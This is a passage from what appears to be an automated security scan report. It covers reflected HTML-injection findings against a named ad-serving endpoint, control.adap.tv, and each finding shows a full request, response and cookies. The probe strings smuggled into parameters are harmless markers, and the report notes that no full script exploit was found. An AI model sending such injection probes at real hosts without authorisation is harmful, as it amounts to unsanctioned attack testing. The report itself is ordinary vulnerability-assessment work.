Server: Jetty(6.1.22)
Content-Length: 29673

<?xml version="1.0" encoding="UTF-8"?>
<OneScript>
<Breadcrumbs>
<Query><![CDATA[description=Good%20news%20for%20those%20who%20feel%20stuffy%20saying%20'whom.'&zid=mwvideo_autosilent&url=h
...[SNIP]...
w.merriam-webster.com%2Fdictionary%2Fxss&width=320&keywords=test%2Cvideo%2Cadaptv&id=0024-whowhom&isTop=true&title=Who%20vs.%20Whom&categories=category1%2Ccategory2&sessionId=cvcrvf&companionId=main_adbfcf8<a>990b97b465b&as=3&eov=fw5il5]]>
...[SNIP]...

1.99. http://control.adap.tv/control [description parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://control.adap.tv
Path:   /control

Issue detail

The value of the description request parameter is copied into the HTML document as plain text between tags. The payload 4bc0b<a>d55f2fa87d4 was submitted in the description parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /control?description=Good%20news%20for%20those%20who%20feel%20stuffy%20saying%20'whom.'4bc0b<a>d55f2fa87d4&zid=mwvideo_autosilent&url=http%3A%2F%2Fvideo.merriam-webster.com%2F0024-whowhom.mp4%3Fec_rate%3D72&duration=111000&height=240&key=mwgames&pageUrl=http%3A%2F%2Fwww.merriam-webster.com%2Fdictionary%2Fxss&width=320&keywords=test%2Cvideo%2Cadaptv&id=0024-whowhom&isTop=true&title=Who%20vs.%20Whom&categories=category1%2Ccategory2&sessionId=cvcrvf&companionId=main_ad&as=3&eov=fw5il5 HTTP/1.1
Host: control.adap.tv
Proxy-Connection: keep-alive
Referer: http://www.merriam-webster.com/swf/player.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adaptv_unique_user_cookie="5951245120132160017__TIME__2011-03-05+18%3A07%3A41"; audienceData="{\"v\":2,\"providers\":{\"10\":{\"f\":1301295600,\"e\":1301295600,\"s\":[],\"a\":[]},\"9\":{\"f\":1301900400,\"e\":1301900400,\"s\":[529,528],\"a\":[]}}}"

Response

HTTP/1.1 200 OK
Access-Control-Allow-Origin: *
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: adaptv_unique_user_cookie="5951245120132160017__TIME__2011-03-06+17%3A00%3A58";Path=/;Domain=.adap.tv;Expires=Thu, 13-Nov-42 02:47:38 GMT
Content-Type: text/xml
Server: Jetty(6.1.22)
Content-Length: 29673

<?xml version="1.0" encoding="UTF-8"?>
<OneScript>
<Breadcrumbs>
<Query><![CDATA[description=Good%20news%20for%20those%20who%20feel%20stuffy%20saying%20'whom.'4bc0b<a>d55f2fa87d4&zid=mwvideo_autosilent&url=http%3A%2F%2Fvideo.merriam-webster.com%2F0024-whowhom.mp4%3Fec_rate%3D72&duration=111000&height=240&key=mwgames&pageUrl=http%3A%2F%2Fwww.merriam-webster.com%2Fdictionary%2Fx
...[SNIP]...

1.100. http://control.adap.tv/control [duration parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://control.adap.tv
Path:   /control

Issue detail

The value of the duration request parameter is copied into the HTML document as plain text between tags. The payload 9d05d<a>d0418fc140c was submitted in the duration parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /control?description=Good%20news%20for%20those%20who%20feel%20stuffy%20saying%20'whom.'&zid=mwvideo_autosilent&url=http%3A%2F%2Fvideo.merriam-webster.com%2F0024-whowhom.mp4%3Fec_rate%3D72&duration=1110009d05d<a>d0418fc140c&height=240&key=mwgames&pageUrl=http%3A%2F%2Fwww.merriam-webster.com%2Fdictionary%2Fxss&width=320&keywords=test%2Cvideo%2Cadaptv&id=0024-whowhom&isTop=true&title=Who%20vs.%20Whom&categories=category1%2Ccategory2&sessionId=cvcrvf&companionId=main_ad&as=3&eov=fw5il5 HTTP/1.1
Host: control.adap.tv
Proxy-Connection: keep-alive
Referer: http://www.merriam-webster.com/swf/player.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adaptv_unique_user_cookie="5951245120132160017__TIME__2011-03-05+18%3A07%3A41"; audienceData="{\"v\":2,\"providers\":{\"10\":{\"f\":1301295600,\"e\":1301295600,\"s\":[],\"a\":[]},\"9\":{\"f\":1301900400,\"e\":1301900400,\"s\":[529,528],\"a\":[]}}}"

Response

HTTP/1.1 200 OK
Access-Control-Allow-Origin: *
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: adaptv_unique_user_cookie="5951245120132160017__TIME__2011-03-06+17%3A01%3A20";Path=/;Domain=.adap.tv;Expires=Thu, 13-Nov-42 02:48:00 GMT
Content-Type: text/xml
Server: Jetty(6.1.22)
Content-Length: 30501

<?xml version="1.0" encoding="UTF-8"?>
<OneScript>
<Breadcrumbs>
<Query><![CDATA[description=Good%20news%20for%20those%20who%20feel%20stuffy%20saying%20'whom.'&zid=mwvideo_autosilent&url=http%3A%2F%2Fvideo.merriam-webster.com%2F0024-whowhom.mp4%3Fec_rate%3D72&duration=1110009d05d<a>d0418fc140c&height=240&key=mwgames&pageUrl=http%3A%2F%2Fwww.merriam-webster.com%2Fdictionary%2Fxss&width=320&keywords=test%2Cvideo%2Cadaptv&id=0024-whowhom&isTop=true&title=Who%20vs.%20Whom&categories=category1%2
...[SNIP]...

1.101. http://control.adap.tv/control [eov parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://control.adap.tv
Path:   /control

Issue detail

The value of the eov request parameter is copied into the HTML document as plain text between tags. The payload d55ca<a>e622e206ef9 was submitted in the eov parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /control?description=Good%20news%20for%20those%20who%20feel%20stuffy%20saying%20'whom.'&zid=mwvideo_autosilent&url=http%3A%2F%2Fvideo.merriam-webster.com%2F0024-whowhom.mp4%3Fec_rate%3D72&duration=111000&height=240&key=mwgames&pageUrl=http%3A%2F%2Fwww.merriam-webster.com%2Fdictionary%2Fxss&width=320&keywords=test%2Cvideo%2Cadaptv&id=0024-whowhom&isTop=true&title=Who%20vs.%20Whom&categories=category1%2Ccategory2&sessionId=cvcrvf&companionId=main_ad&as=3&eov=fw5il5d55ca<a>e622e206ef9 HTTP/1.1
Host: control.adap.tv
Proxy-Connection: keep-alive
Referer: http://www.merriam-webster.com/swf/player.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adaptv_unique_user_cookie="5951245120132160017__TIME__2011-03-05+18%3A07%3A41"; audienceData="{\"v\":2,\"providers\":{\"10\":{\"f\":1301295600,\"e\":1301295600,\"s\":[],\"a\":[]},\"9\":{\"f\":1301900400,\"e\":1301900400,\"s\":[529,528],\"a\":[]}}}"

Response

HTTP/1.1 200 OK
Access-Control-Allow-Origin: *
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: adaptv_unique_user_cookie="5951245120132160017__TIME__2011-03-06+17%3A07%3A14";Path=/;Domain=.adap.tv;Expires=Thu, 13-Nov-42 02:53:54 GMT
Content-Type: text/xml
Server: Jetty(6.1.22)
Content-Length: 29673

<?xml version="1.0" encoding="UTF-8"?>
<OneScript>
<Breadcrumbs>
<Query><![CDATA[description=Good%20news%20for%20those%20who%20feel%20stuffy%20saying%20'whom.'&zid=mwvideo_autosilent&url=h
...[SNIP]...
r.com%2Fdictionary%2Fxss&width=320&keywords=test%2Cvideo%2Cadaptv&id=0024-whowhom&isTop=true&title=Who%20vs.%20Whom&categories=category1%2Ccategory2&sessionId=cvcrvf&companionId=main_ad&as=3&eov=fw5il5d55ca<a>e622e206ef9]]>
...[SNIP]...

1.102. http://control.adap.tv/control [height parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://control.adap.tv
Path:   /control

Issue detail

The value of the height request parameter is copied into the HTML document as plain text between tags. The payload 6eead<a>c1e6e1a085e was submitted in the height parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /control?description=Good%20news%20for%20those%20who%20feel%20stuffy%20saying%20'whom.'&zid=mwvideo_autosilent&url=http%3A%2F%2Fvideo.merriam-webster.com%2F0024-whowhom.mp4%3Fec_rate%3D72&duration=111000&height=2406eead<a>c1e6e1a085e&key=mwgames&pageUrl=http%3A%2F%2Fwww.merriam-webster.com%2Fdictionary%2Fxss&width=320&keywords=test%2Cvideo%2Cadaptv&id=0024-whowhom&isTop=true&title=Who%20vs.%20Whom&categories=category1%2Ccategory2&sessionId=cvcrvf&companionId=main_ad&as=3&eov=fw5il5 HTTP/1.1
Host: control.adap.tv
Proxy-Connection: keep-alive
Referer: http://www.merriam-webster.com/swf/player.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adaptv_unique_user_cookie="5951245120132160017__TIME__2011-03-05+18%3A07%3A41"; audienceData="{\"v\":2,\"providers\":{\"10\":{\"f\":1301295600,\"e\":1301295600,\"s\":[],\"a\":[]},\"9\":{\"f\":1301900400,\"e\":1301900400,\"s\":[529,528],\"a\":[]}}}"

Response

HTTP/1.1 200 OK
Access-Control-Allow-Origin: *
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: adaptv_unique_user_cookie="5951245120132160017__TIME__2011-03-06+17%3A01%3A27";Path=/;Domain=.adap.tv;Expires=Thu, 13-Nov-42 02:48:07 GMT
Content-Type: text/xml
Server: Jetty(6.1.22)
Content-Length: 30501

<?xml version="1.0" encoding="UTF-8"?>
<OneScript>
<Breadcrumbs>
<Query><![CDATA[description=Good%20news%20for%20those%20who%20feel%20stuffy%20saying%20'whom.'&zid=mwvideo_autosilent&url=http%3A%2F%2Fvideo.merriam-webster.com%2F0024-whowhom.mp4%3Fec_rate%3D72&duration=111000&height=2406eead<a>c1e6e1a085e&key=mwgames&pageUrl=http%3A%2F%2Fwww.merriam-webster.com%2Fdictionary%2Fxss&width=320&keywords=test%2Cvideo%2Cadaptv&id=0024-whowhom&isTop=true&title=Who%20vs.%20Whom&categories=category1%2Ccategory2&
...[SNIP]...

1.103. http://control.adap.tv/control [id parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://control.adap.tv
Path:   /control

Issue detail

The value of the id request parameter is copied into the HTML document as plain text between tags. The payload ca11a<a>6a67868646c was submitted in the id parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /control?description=Good%20news%20for%20those%20who%20feel%20stuffy%20saying%20'whom.'&zid=mwvideo_autosilent&url=http%3A%2F%2Fvideo.merriam-webster.com%2F0024-whowhom.mp4%3Fec_rate%3D72&duration=111000&height=240&key=mwgames&pageUrl=http%3A%2F%2Fwww.merriam-webster.com%2Fdictionary%2Fxss&width=320&keywords=test%2Cvideo%2Cadaptv&id=0024-whowhomca11a<a>6a67868646c&isTop=true&title=Who%20vs.%20Whom&categories=category1%2Ccategory2&sessionId=cvcrvf&companionId=main_ad&as=3&eov=fw5il5 HTTP/1.1
Host: control.adap.tv
Proxy-Connection: keep-alive
Referer: http://www.merriam-webster.com/swf/player.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adaptv_unique_user_cookie="5951245120132160017__TIME__2011-03-05+18%3A07%3A41"; audienceData="{\"v\":2,\"providers\":{\"10\":{\"f\":1301295600,\"e\":1301295600,\"s\":[],\"a\":[]},\"9\":{\"f\":1301900400,\"e\":1301900400,\"s\":[529,528],\"a\":[]}}}"

Response

HTTP/1.1 200 OK
Access-Control-Allow-Origin: *
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: adaptv_unique_user_cookie="5951245120132160017__TIME__2011-03-06+17%3A02%3A48";Path=/;Domain=.adap.tv;Expires=Thu, 13-Nov-42 02:49:28 GMT
Content-Type: text/xml
Server: Jetty(6.1.22)
Content-Length: 30501

<?xml version="1.0" encoding="UTF-8"?>
<OneScript>
<Breadcrumbs>
<Query><![CDATA[description=Good%20news%20for%20those%20who%20feel%20stuffy%20saying%20'whom.'&zid=mwvideo_autosilent&url=h
...[SNIP]...
ter.com%2F0024-whowhom.mp4%3Fec_rate%3D72&duration=111000&height=240&key=mwgames&pageUrl=http%3A%2F%2Fwww.merriam-webster.com%2Fdictionary%2Fxss&width=320&keywords=test%2Cvideo%2Cadaptv&id=0024-whowhomca11a<a>6a67868646c&isTop=true&title=Who%20vs.%20Whom&categories=category1%2Ccategory2&sessionId=cvcrvf&companionId=main_ad&as=3&eov=fw5il5]]>
...[SNIP]...

1.104. http://control.adap.tv/control [isTop parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://control.adap.tv
Path:   /control

Issue detail

The value of the isTop request parameter is copied into the HTML document as plain text between tags. The payload 8b341<a>9d6b8a426a3 was submitted in the isTop parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /control?description=Good%20news%20for%20those%20who%20feel%20stuffy%20saying%20'whom.'&zid=mwvideo_autosilent&url=http%3A%2F%2Fvideo.merriam-webster.com%2F0024-whowhom.mp4%3Fec_rate%3D72&duration=111000&height=240&key=mwgames&pageUrl=http%3A%2F%2Fwww.merriam-webster.com%2Fdictionary%2Fxss&width=320&keywords=test%2Cvideo%2Cadaptv&id=0024-whowhom&isTop=true8b341<a>9d6b8a426a3&title=Who%20vs.%20Whom&categories=category1%2Ccategory2&sessionId=cvcrvf&companionId=main_ad&as=3&eov=fw5il5 HTTP/1.1
Host: control.adap.tv
Proxy-Connection: keep-alive
Referer: http://www.merriam-webster.com/swf/player.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adaptv_unique_user_cookie="5951245120132160017__TIME__2011-03-05+18%3A07%3A41"; audienceData="{\"v\":2,\"providers\":{\"10\":{\"f\":1301295600,\"e\":1301295600,\"s\":[],\"a\":[]},\"9\":{\"f\":1301900400,\"e\":1301900400,\"s\":[529,528],\"a\":[]}}}"

Response

HTTP/1.1 200 OK
Access-Control-Allow-Origin: *
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: adaptv_unique_user_cookie="5951245120132160017__TIME__2011-03-06+17%3A03%3A34";Path=/;Domain=.adap.tv;Expires=Thu, 13-Nov-42 02:50:14 GMT
Content-Type: text/xml
Server: Jetty(6.1.22)
Content-Length: 29673

<?xml version="1.0" encoding="UTF-8"?>
<OneScript>
<Breadcrumbs>
<Query><![CDATA[description=Good%20news%20for%20those%20who%20feel%20stuffy%20saying%20'whom.'&zid=mwvideo_autosilent&url=h
...[SNIP]...
024-whowhom.mp4%3Fec_rate%3D72&duration=111000&height=240&key=mwgames&pageUrl=http%3A%2F%2Fwww.merriam-webster.com%2Fdictionary%2Fxss&width=320&keywords=test%2Cvideo%2Cadaptv&id=0024-whowhom&isTop=true8b341<a>9d6b8a426a3&title=Who%20vs.%20Whom&categories=category1%2Ccategory2&sessionId=cvcrvf&companionId=main_ad&as=3&eov=fw5il5]]>
...[SNIP]...

1.105. http://control.adap.tv/control [keywords parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://control.adap.tv
Path:   /control

Issue detail

The value of the keywords request parameter is copied into the HTML document as plain text between tags. The payload f0eed<a>c6c1a053c81 was submitted in the keywords parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /control?description=Good%20news%20for%20those%20who%20feel%20stuffy%20saying%20'whom.'&zid=mwvideo_autosilent&url=http%3A%2F%2Fvideo.merriam-webster.com%2F0024-whowhom.mp4%3Fec_rate%3D72&duration=111000&height=240&key=mwgames&pageUrl=http%3A%2F%2Fwww.merriam-webster.com%2Fdictionary%2Fxss&width=320&keywords=test%2Cvideo%2Cadaptvf0eed<a>c6c1a053c81&id=0024-whowhom&isTop=true&title=Who%20vs.%20Whom&categories=category1%2Ccategory2&sessionId=cvcrvf&companionId=main_ad&as=3&eov=fw5il5 HTTP/1.1
Host: control.adap.tv
Proxy-Connection: keep-alive
Referer: http://www.merriam-webster.com/swf/player.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adaptv_unique_user_cookie="5951245120132160017__TIME__2011-03-05+18%3A07%3A41"; audienceData="{\"v\":2,\"providers\":{\"10\":{\"f\":1301295600,\"e\":1301295600,\"s\":[],\"a\":[]},\"9\":{\"f\":1301900400,\"e\":1301900400,\"s\":[529,528],\"a\":[]}}}"

Response

HTTP/1.1 200 OK
Access-Control-Allow-Origin: *
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: adaptv_unique_user_cookie="5951245120132160017__TIME__2011-03-06+17%3A02%3A12";Path=/;Domain=.adap.tv;Expires=Thu, 13-Nov-42 02:48:52 GMT
Content-Type: text/xml
Server: Jetty(6.1.22)
Content-Length: 29696

<?xml version="1.0" encoding="UTF-8"?>
<OneScript>
<Breadcrumbs>
<Query><![CDATA[description=Good%20news%20for%20those%20who%20feel%20stuffy%20saying%20'whom.'&zid=mwvideo_autosilent&url=h
...[SNIP]...
deo.merriam-webster.com%2F0024-whowhom.mp4%3Fec_rate%3D72&duration=111000&height=240&key=mwgames&pageUrl=http%3A%2F%2Fwww.merriam-webster.com%2Fdictionary%2Fxss&width=320&keywords=test%2Cvideo%2Cadaptvf0eed<a>c6c1a053c81&id=0024-whowhom&isTop=true&title=Who%20vs.%20Whom&categories=category1%2Ccategory2&sessionId=cvcrvf&companionId=main_ad&as=3&eov=fw5il5]]>
...[SNIP]...

1.106. http://control.adap.tv/control [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://control.adap.tv
Path:   /control

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 8c976<a>f1ee9229782 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /control?description=Good%20news%20for%20those%20who%20feel%20stuffy%20saying%20'whom.'&zid=mwvideo_autosilent&url=http%3A%2F%2Fvideo.merriam-webster.com%2F0024-whowhom.mp4%3Fec_rate%3D72&duration=111000&height=240&key=mwgames&pageUrl=http%3A%2F%2Fwww.merriam-webster.com%2Fdictionary%2Fxss&width=320&keywords=test%2Cvideo%2Cadaptv&id=0024-whowhom&isTop=true&title=Who%20vs.%20Whom&categories=category1%2Ccategory2&sessionId=cvcrvf&companionId=main_ad&as=3&eov=fw5il5&8c976<a>f1ee9229782=1 HTTP/1.1
Host: control.adap.tv
Proxy-Connection: keep-alive
Referer: http://www.merriam-webster.com/swf/player.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adaptv_unique_user_cookie="5951245120132160017__TIME__2011-03-05+18%3A07%3A41"; audienceData="{\"v\":2,\"providers\":{\"10\":{\"f\":1301295600,\"e\":1301295600,\"s\":[],\"a\":[]},\"9\":{\"f\":1301900400,\"e\":1301900400,\"s\":[529,528],\"a\":[]}}}"

Response

HTTP/1.1 200 OK
Access-Control-Allow-Origin: *
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: adaptv_unique_user_cookie="5951245120132160017__TIME__2011-03-06+17%3A08%3A37";Path=/;Domain=.adap.tv;Expires=Thu, 13-Nov-42 02:55:17 GMT
Content-Type: text/xml
Server: Jetty(6.1.22)
Content-Length: 29676

<?xml version="1.0" encoding="UTF-8"?>
<OneScript>
<Breadcrumbs>
<Query><![CDATA[description=Good%20news%20for%20those%20who%20feel%20stuffy%20saying%20'whom.'&zid=mwvideo_autosilent&url=h
...[SNIP]...
.com%2Fdictionary%2Fxss&width=320&keywords=test%2Cvideo%2Cadaptv&id=0024-whowhom&isTop=true&title=Who%20vs.%20Whom&categories=category1%2Ccategory2&sessionId=cvcrvf&companionId=main_ad&as=3&eov=fw5il5&8c976<a>f1ee9229782=1]]>
...[SNIP]...

1.107. http://control.adap.tv/control [pageUrl parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://control.adap.tv
Path:   /control

Issue detail

The value of the pageUrl request parameter is copied into the HTML document as plain text between tags. The payload d673b<a>3e906cc1dac was submitted in the pageUrl parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /control?description=Good%20news%20for%20those%20who%20feel%20stuffy%20saying%20'whom.'&zid=mwvideo_autosilent&url=http%3A%2F%2Fvideo.merriam-webster.com%2F0024-whowhom.mp4%3Fec_rate%3D72&duration=111000&height=240&key=mwgames&pageUrl=http%3A%2F%2Fwww.merriam-webster.com%2Fdictionary%2Fxssd673b<a>3e906cc1dac&width=320&keywords=test%2Cvideo%2Cadaptv&id=0024-whowhom&isTop=true&title=Who%20vs.%20Whom&categories=category1%2Ccategory2&sessionId=cvcrvf&companionId=main_ad&as=3&eov=fw5il5 HTTP/1.1
Host: control.adap.tv
Proxy-Connection: keep-alive
Referer: http://www.merriam-webster.com/swf/player.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adaptv_unique_user_cookie="5951245120132160017__TIME__2011-03-05+18%3A07%3A41"; audienceData="{\"v\":2,\"providers\":{\"10\":{\"f\":1301295600,\"e\":1301295600,\"s\":[],\"a\":[]},\"9\":{\"f\":1301900400,\"e\":1301900400,\"s\":[529,528],\"a\":[]}}}"

Response

HTTP/1.1 200 OK
Access-Control-Allow-Origin: *
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: adaptv_unique_user_cookie="5951245120132160017__TIME__2011-03-06+17%3A01%3A34";Path=/;Domain=.adap.tv;Expires=Thu, 13-Nov-42 02:48:14 GMT
Content-Type: text/xml
Server: Jetty(6.1.22)
Content-Length: 30501

<?xml version="1.0" encoding="UTF-8"?>
<OneScript>
<Breadcrumbs>
<Query><![CDATA[description=Good%20news%20for%20those%20who%20feel%20stuffy%20saying%20'whom.'&zid=mwvideo_autosilent&url=http%3A%2F%2Fvideo.merriam-webster.com%2F0024-whowhom.mp4%3Fec_rate%3D72&duration=111000&height=240&key=mwgames&pageUrl=http%3A%2F%2Fwww.merriam-webster.com%2Fdictionary%2Fxssd673b<a>3e906cc1dac&width=320&keywords=test%2Cvideo%2Cadaptv&id=0024-whowhom&isTop=true&title=Who%20vs.%20Whom&categories=category1%2Ccategory2&sessionId=cvcrvf&companionId=main_ad&as=3&eov=fw5il5]]>
...[SNIP]...

1.108. http://control.adap.tv/control [sessionId parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://control.adap.tv
Path:   /control

Issue detail

The value of the sessionId request parameter is copied into the HTML document as plain text between tags. The payload 2f8c4<a>ac8a344f53e was submitted in the sessionId parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /control?description=Good%20news%20for%20those%20who%20feel%20stuffy%20saying%20'whom.'&zid=mwvideo_autosilent&url=http%3A%2F%2Fvideo.merriam-webster.com%2F0024-whowhom.mp4%3Fec_rate%3D72&duration=111000&height=240&key=mwgames&pageUrl=http%3A%2F%2Fwww.merriam-webster.com%2Fdictionary%2Fxss&width=320&keywords=test%2Cvideo%2Cadaptv&id=0024-whowhom&isTop=true&title=Who%20vs.%20Whom&categories=category1%2Ccategory2&sessionId=cvcrvf2f8c4<a>ac8a344f53e&companionId=main_ad&as=3&eov=fw5il5 HTTP/1.1
Host: control.adap.tv
Proxy-Connection: keep-alive
Referer: http://www.merriam-webster.com/swf/player.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adaptv_unique_user_cookie="5951245120132160017__TIME__2011-03-05+18%3A07%3A41"; audienceData="{\"v\":2,\"providers\":{\"10\":{\"f\":1301295600,\"e\":1301295600,\"s\":[],\"a\":[]},\"9\":{\"f\":1301900400,\"e\":1301900400,\"s\":[529,528],\"a\":[]}}}"

Response

HTTP/1.1 200 OK
Access-Control-Allow-Origin: *
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: adaptv_unique_user_cookie="5951245120132160017__TIME__2011-03-06+17%3A05%3A12";Path=/;Domain=.adap.tv;Expires=Thu, 13-Nov-42 02:51:52 GMT
Content-Type: text/xml
Server: Jetty(6.1.22)
Content-Length: 30501

<?xml version="1.0" encoding="UTF-8"?>
<OneScript>
<Breadcrumbs>
<Query><![CDATA[description=Good%20news%20for%20those%20who%20feel%20stuffy%20saying%20'whom.'&zid=mwvideo_autosilent&url=h
...[SNIP]...
eUrl=http%3A%2F%2Fwww.merriam-webster.com%2Fdictionary%2Fxss&width=320&keywords=test%2Cvideo%2Cadaptv&id=0024-whowhom&isTop=true&title=Who%20vs.%20Whom&categories=category1%2Ccategory2&sessionId=cvcrvf2f8c4<a>ac8a344f53e&companionId=main_ad&as=3&eov=fw5il5]]>
...[SNIP]...

1.109. http://control.adap.tv/control [title parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://control.adap.tv
Path:   /control

Issue detail

The value of the title request parameter is copied into the HTML document as plain text between tags. The payload 9174f<a>7150df027b was submitted in the title parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

